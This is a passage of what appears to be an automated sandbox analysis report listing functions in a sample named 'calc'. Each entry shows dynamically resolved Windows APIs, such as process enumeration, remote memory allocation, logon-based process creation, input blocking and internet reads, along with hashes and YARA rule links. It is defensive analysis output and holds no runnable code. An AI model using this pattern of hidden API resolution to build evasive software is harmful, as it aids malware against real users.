    • Instruction ID: c37a48820cd0ffcfbf34dd1ef459abadf152d0e03d59a3200862424fa437e460
    • Opcode Fuzzy Hash: 0d504de1963ce42602e00efced6689885ade31a502019b9bd417622be1b721a3
    • Instruction Fuzzy Hash: CED0C970641702EFCB208FA1D84D7177AF8AB48703F20DD6AB486E1260E778C440CE1E
    Function 00416372 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,0041461F,74DF0F00,00479E08), ref: 0041637D
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: CreateToolhelp32Snapshot$kernel32.dll
    • API String ID: 2574300362-2184173117
    • Opcode ID: 62595157b22fda739014627afa9ea7e3df963d3aed48f7e5d35cffbc788012c6
    • Instruction ID: 9f7cde7f1173ff8d5ff4e5ff3ff1ee0d7b1cb5314f7db605f839c3c4faef6e20
    • Opcode Fuzzy Hash: 62595157b22fda739014627afa9ea7e3df963d3aed48f7e5d35cffbc788012c6
    • Instruction Fuzzy Hash: ADD0C970580706EFCB20AF61C8897137AE8AB50703F228C6AF8A9D2652D778D484CF1C
    Function 004163C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,00414641,74DF0F00,00479E08), ref: 004163CB
    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: Process32NextW$kernel32.dll
    • API String ID: 2574300362-1444338893
    • Opcode ID: b7a060d01d0b2cbd5aeda42b9088a336d274536439e0dbfa02d83227cf22a235
    • Instruction ID: 8319ed1bb1247ee7603d4177eb116fae53f33f119acae12130f3e88490653f2d
    • Opcode Fuzzy Hash: b7a060d01d0b2cbd5aeda42b9088a336d274536439e0dbfa02d83227cf22a235
    • Instruction Fuzzy Hash: 02D0C770A40706EFC7305F61C88971376D46B01747F10886AF855D1251D778C484DB1C
    Function 004163E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Psapi.dll,004147A2,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 004163F2
    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00416404
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: EnumProcesses$Psapi.dll
    • API String ID: 2574300362-2142768860
    • Opcode ID: 618d42fc2998ab4b9def28153cc674556f41129a2cc7aa5b9427e406e46b19de
    • Instruction ID: b611058c7bdc95c68707464a329fe9fe04a65dd60b5ac42159b78de10f9528b9
    • Opcode Fuzzy Hash: 618d42fc2998ab4b9def28153cc674556f41129a2cc7aa5b9427e406e46b19de
    • Instruction Fuzzy Hash: 1ED0C7B0A40302DAC7205F61E84975A76D46F14703F11C86AF489D1153D778C485CA5C
    Function 00416399 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,00414630,74DF0F00,00479E08), ref: 004163A4
    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: Process32FirstW$kernel32.dll
    • API String ID: 2574300362-3009187892
    • Opcode ID: 3ef915f0c527edf8a262af86bca1cad1980d7eba1d139d0164bfb6967e731860
    • Instruction ID: ac7a4e64c3133c5cf8734401ae9bcbe9a4321e908ed6f167add39891081ddbe8
    • Opcode Fuzzy Hash: 3ef915f0c527edf8a262af86bca1cad1980d7eba1d139d0164bfb6967e731860
    • Instruction Fuzzy Hash: 53D0C770540706EEC7205F65C84971376D86B04703F14986EFC55D1665D778C484CB1C
    Function 0043B451 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0043B45C
    • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0043B46E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: Advapi32.dll$CreateProcessWithLogonW
    • API String ID: 2574300362-755999451
    • Opcode ID: a1b84ca584a243ed6f42446eea0f28c42173d9ea2547da7be013d56738bda288
    • Instruction ID: 9c273b0ebcd64cb7b02c8d38e944e95f0e50cbb72423db979123efa01101c5c7
    • Opcode Fuzzy Hash: a1b84ca584a243ed6f42446eea0f28c42173d9ea2547da7be013d56738bda288
    • Instruction Fuzzy Hash: 57D0C770541702FEC7205F71C94A71276D4EB14702F50DC6BB5D5D1152D778C440C65D
    Function 0041640E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Psapi.dll,004147B9,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00416419
    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041642B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: EnumProcessModules$Psapi.dll
    • API String ID: 2574300362-751739868
    • Opcode ID: dca742bf0c2191a18ea4fe831902174497c2352ed576befcdaccc270da9a43b6
    • Instruction ID: 62cb81f13000a8f0cdb4eca7f8b3d29870d74f906e8d53b8d7c9d3e7b9002be5
    • Opcode Fuzzy Hash: dca742bf0c2191a18ea4fe831902174497c2352ed576befcdaccc270da9a43b6
    • Instruction Fuzzy Hash: 26D0C9B4942302EACB209F65C84975676E8AF20707F21C86AF889D1252D778D484CA1D
    Function 00416435 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Psapi.dll,004147CB,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00416440
    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00416452
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: GetModuleBaseNameW$Psapi.dll
    • API String ID: 2574300362-3411073148
    • Opcode ID: e5c48572f6529f94537383b70a5a634ed20031b773c13a46fdf1be52ef221d82
    • Instruction ID: 1d527614041dbbbff0230691deebb7a116d124e4bb4cc2624b0546b3f0bf7ad4
    • Opcode Fuzzy Hash: e5c48572f6529f94537383b70a5a634ed20031b773c13a46fdf1be52ef221d82
    • Instruction Fuzzy Hash: 11D0C9B0940302EADB208F71C8697167BE8AF10703F21CC6AF88AD1251D778C584CE1D
    Function 004124CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,004124A7,?,004123DC,00000000,00000000,?,00001000,00000004,?,00000800,?,004029FA,00000800), ref: 004124D6
    • GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004124E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: VirtualAllocEx$kernel32.dll
    • API String ID: 2574300362-4123781057
    • Opcode ID: ac77adb85ffff738263622ca5f465b0932883e972d6436550eac2d7088bc0854
    • Instruction ID: 4ea207f8d300591824fdddc5101b73d117a3650087baea29c81dc6a0e988711c
    • Opcode Fuzzy Hash: ac77adb85ffff738263622ca5f465b0932883e972d6436550eac2d7088bc0854
    • Instruction Fuzzy Hash: D3D09270540703AACB209F65888971276A8AB41742F20C86AFC99D2262DBB8A4849A18
    Function 004124F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,004124BD,?,0041232F,?,?,00000000,00008000,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 004124FD
    • GetProcAddress.KERNEL32(00000000,VirtualFreeEx), ref: 0041250F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: VirtualFreeEx$kernel32.dll
    • API String ID: 2574300362-1049216354
    • Opcode ID: 04932301f2a78cefe13b07c69231992dba8d4483a09363a98b225d0f638a4b1c
    • Instruction ID: 6da001b12922d3df2c6c474ef46ecd45665f6b37187fb57d2993ef705c1d34b1
    • Opcode Fuzzy Hash: 04932301f2a78cefe13b07c69231992dba8d4483a09363a98b225d0f638a4b1c
    • Instruction Fuzzy Hash: A0D09270580702AADB309F61898971276A8AB10707F20886AA899E2252D7B8D4848A69
    Function 004265CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,0042476F), ref: 004265D5
    • GetProcAddress.KERNEL32(00000000,CreateHardLinkW), ref: 004265E7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: CreateHardLinkW$kernel32.dll
    • API String ID: 2574300362-294928789
    • Opcode ID: aaf9ae32a098f21c7d34c0c2c7b5f3892074f661c523aa0547104ae0aadf32d8
    • Instruction ID: 9b13fefce5e6226982f924ed578a84b6c2732edf1a0fe20b4d9930c0dc0723ad
    • Opcode Fuzzy Hash: aaf9ae32a098f21c7d34c0c2c7b5f3892074f661c523aa0547104ae0aadf32d8
    • Instruction Fuzzy Hash: DFD0C770680703EEC7605F61E85971376D46F21703F14887EF455D1255EBB8D484C71D
    Function 004265F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(shell32.dll,00425246), ref: 004265FC
    • GetProcAddress.KERNEL32(00000000,SHEmptyRecycleBinW), ref: 0042660E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: SHEmptyRecycleBinW$shell32.dll
    • API String ID: 2574300362-2648762502
    • Opcode ID: 5c5870679de98fa3a7f171b2adc597053b1240f36dedf80deb4db5d465042c9f
    • Instruction ID: 69feca8f4b5e5024963817c407de152b5a8bb493189561f5f2a67b8f08b708d8
    • Opcode Fuzzy Hash: 5c5870679de98fa3a7f171b2adc597053b1240f36dedf80deb4db5d465042c9f
    • Instruction Fuzzy Hash: 3AD0C9B0690302EBCB204F61E84D7237AE8AF14702F2088AEF4C5D2251E778CC40CA1D
    Function 004265A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(kernel32.dll,00424144,00000000,00000000), ref: 004265AE
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExW), ref: 004265C0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: GetDiskFreeSpaceExW$kernel32.dll
    • API String ID: 2574300362-1127948838
    • Opcode ID: ed3e403a5b733a6f55669303d0031102fcebbe94640a3d4ebf8c367d74782769
    • Instruction ID: 56f10fb3c108574ad7c62506ca6988ab3858942f7107cd8a287994bf9634255d
    • Opcode Fuzzy Hash: ed3e403a5b733a6f55669303d0031102fcebbe94640a3d4ebf8c367d74782769
    • Instruction Fuzzy Hash: F5D0C974640702EECB209F61E88971376E8AF10703F20886EF499D2259D778C884CB5D
    Function 004418D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,004413C5), ref: 004418DF
    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004418F1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: MonitorFromPoint$user32.dll
    • API String ID: 2574300362-355800951
    • Opcode ID: 92819eae385e9d12839bf3ea17687f83216c2e149adf21791c5037f7f1619343
    • Instruction ID: d816af7e206fa6fb37d144fb02bdc24e08f93184c1c263658b26d2d31832ab4b
    • Opcode Fuzzy Hash: 92819eae385e9d12839bf3ea17687f83216c2e149adf21791c5037f7f1619343
    • Instruction Fuzzy Hash: 88D0C970540703EEDB20AF61C88971276E8BF20713F20887BB88BD2261DB7CC480DA1D
    Function 004418FB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,004413D3), ref: 00441906
    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00441918
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: GetMonitorInfoW$user32.dll
    • API String ID: 2574300362-3787768890
    • Opcode ID: 87460ed2882eeec03f62f8abfe9a272826d6655d9327dffbe0991a640beb69e2
    • Instruction ID: 1973df5bb126482aae2e4e6a8735d8a15de43624a53d5d51aca769ce645b95dc
    • Opcode Fuzzy Hash: 87460ed2882eeec03f62f8abfe9a272826d6655d9327dffbe0991a640beb69e2
    • Instruction Fuzzy Hash: 56D0C9B0540702EEDB205FE1C889712B6E8EB54703F208C7BF889D1661E77CC480CA1D
    Function 0040D903 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,0040AD7E), ref: 0040D90E
    • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 0040D920
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: SetLayeredWindowAttributes$user32.dll
    • API String ID: 2574300362-3673630139
    • Opcode ID: 0b9319c72a3938820b8e29fe754c2ff4bd06b79e130f39b896147091e9f707c9
    • Instruction ID: d95a0980b9b24fbccb637a881063bc43dac3bd5ace8db47cbba05e6c3ea30a14
    • Opcode Fuzzy Hash: 0b9319c72a3938820b8e29fe754c2ff4bd06b79e130f39b896147091e9f707c9
    • Instruction Fuzzy Hash: 22D0C9B4980302EECB205FA1C8897227BE8EB14703F20887BF889E1291D778C448CA5C
    Function 0042FD05 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042A928), ref: 0042FD10
    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0042FD22
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetReadFile$Wininet.dll
    • API String ID: 2574300362-924813344
    • Opcode ID: 0b024437d5a358529518af0740c8c3f3769af86ed8bba1f9015ea3fd8d59a6c0
    • Instruction ID: 0738d51040bf5b37f2d3baf1b8c1fd70f6f3e5145db968a4aeea1ded9e3f9793
    • Opcode Fuzzy Hash: 0b024437d5a358529518af0740c8c3f3769af86ed8bba1f9015ea3fd8d59a6c0
    • Instruction Fuzzy Hash: 1ED0C970651316EEEB205FB1D8497137AF8AB54702F608C7EB48AD1261EBB8D444CA5E
    Function 0042FE76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,0042A1CD), ref: 0042FE81
    • GetProcAddress.KERNEL32(00000000,BlockInput), ref: 0042FE93
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
